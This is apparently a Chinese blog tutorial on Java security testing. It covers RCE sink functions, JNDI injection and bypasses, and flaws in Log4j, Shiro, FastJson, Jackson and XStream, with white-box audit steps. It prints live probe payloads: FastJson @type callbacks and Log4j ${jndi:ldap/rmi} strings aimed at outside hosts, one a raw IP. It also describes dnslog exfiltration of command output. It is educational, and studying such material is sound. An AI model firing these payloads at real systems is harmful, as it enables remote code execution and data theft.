#知识点:
1、Java安全-RCE执行-5大类函数调用
2、Java安全-JNDI注入-RMI&LDAP&高版本
3、Java安全-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j
一、演示案例-Java安全-RCE执行-5大类函数调用
1、GroovyExec
2、RuntimeExec
3、ProcessImpl
4、ProcessBuilder
5、ScriptEngineManager
检测:
黑盒看参数名和参数值
白盒看类函数名和可控变量(大部分白盒)
二、演示案例-Java安全-JNDI注入(RCE)-RMI&LDAP&高版本
介绍
JNDI全称为 Java Naming and
DirectoryInterface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。
RMI:远程方法调用注册表
LDAP:轻量级目录访问协议
调用检索:
Java为了将Object对象存储在Naming或Directory服务下,提供了Naming
Reference功能,对象可以通过绑定Reference存储在Naming或Directory服务下,比如RMI、LDAP等。javax.naming.InitialContext.lookup()
在RMI服务中调用了InitialContext.lookup()的类有:
org.springframework.transaction.jta.JtaTransactionManager.readObject()
com.sun.rowset.JdbcRowSetImpl.execute()
javax.management.remote.rmi.RMIConnector.connect()
org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName(String sfJNDIName)
在LDAP服务中调用了InitialContext.lookup()的类有:
InitialDirContext.lookup()
Spring LdapTemplate.lookup()
LdapTemplate.lookupContext()
检测:
无黑盒思路
白盒看类函数名和可控变量
靶场演示
jndi本身不是漏洞,是java用来远程加载文件执行从而造成一个RCE的结果,一般是在漏洞利用的时候会使用这个jndi注入达到一个RCE目的。
JDNI注入安全问题(导致RCE)
JDNI注入利用条件
但是有一种情况就是对方使用了高版本的jdk,然后该工具全部的payload都不行怎么办?
高版本绕过:
https://www.mi1k7ea.com/2020/09/07/浅析高低版JDK下的JNDI注入及绕过/
https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html
可以参考这两个文章,不过都是需要从代码去分析调试跟踪,是有一定门槛的。
三、演示案例-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j
1、Log4j
Apache的一个开源项目,是一个基于Java的日志记录框架。
历史漏洞:https://avd.aliyun.com/search?q=Log4j
有个问题就是弹计算机也是在对方服务器弹,本地肯定不知道成没成功,这时候可以在jndi注入工具中把生成计算机命令改为请求一个dnslog地址来判断不就行了。
2、Shiro
Java安全框架,能够用于身份验证、授权、加密和会话管理。
历史漏洞:https://avd.aliyun.com/search?q=Shiro
3、Jackson
当下流行的json解释器,主要负责处理Json的序列化和反序列化。
历史漏洞:https://avd.aliyun.com/search?q=Jackson
4、FastJson
阿里巴巴公司开源的json解析器,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
历史漏洞:https://avd.aliyun.com/search?q=fastjson
5、XStream
开源Java类库,能将对象序列化成XML或XML反序列化为对象
历史漏洞:https://avd.aliyun.com/search?q=XStream
四、演示案例-白盒审计不安全组件漏洞
FastJson审计
1、源码搭建
2、看引用组件版本及代码实现
漏洞函数
JSON.parse()
JSON.parseObject()
引用组件版本(知道版本就可以去网上找这个版本爆没爆过漏洞)
3、找可控变量及访问实现
admin/product propertyJson
4、测试出网回显调用访问
{"@type":"java.net.Inet4Address","val":"atcuqbczqs.dnstunnel.run"}
Log4j审计
1、看引用组件版本及实现
漏洞函数
logger.info
logger.error
2、找可控变量及访问实现
admin/uploadAdminHeadImage originalFileName
引用组件版本(知道版本就可以去网上找这个版本爆没爆过漏洞)
3、测试出网回显调用访问
${jndi:ldap://jebqzwhwtn.dnstunnel.run}
${jndi:rmi://47.94.236.117:1099/xxxx}
一个一个试(因为不知道源码项目用的什么java版本运行)
不回显常见判断通用方法:
1、直接将命令执行结果写入到静态资源文件里,如html、js等,然后访问。存在这个文件不就说明命令执行能够执行了。
2、通过dnslog进行数据外带,但如果无法执行dns请求就无法验证了。
最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货主要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
扫码领取
9399
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
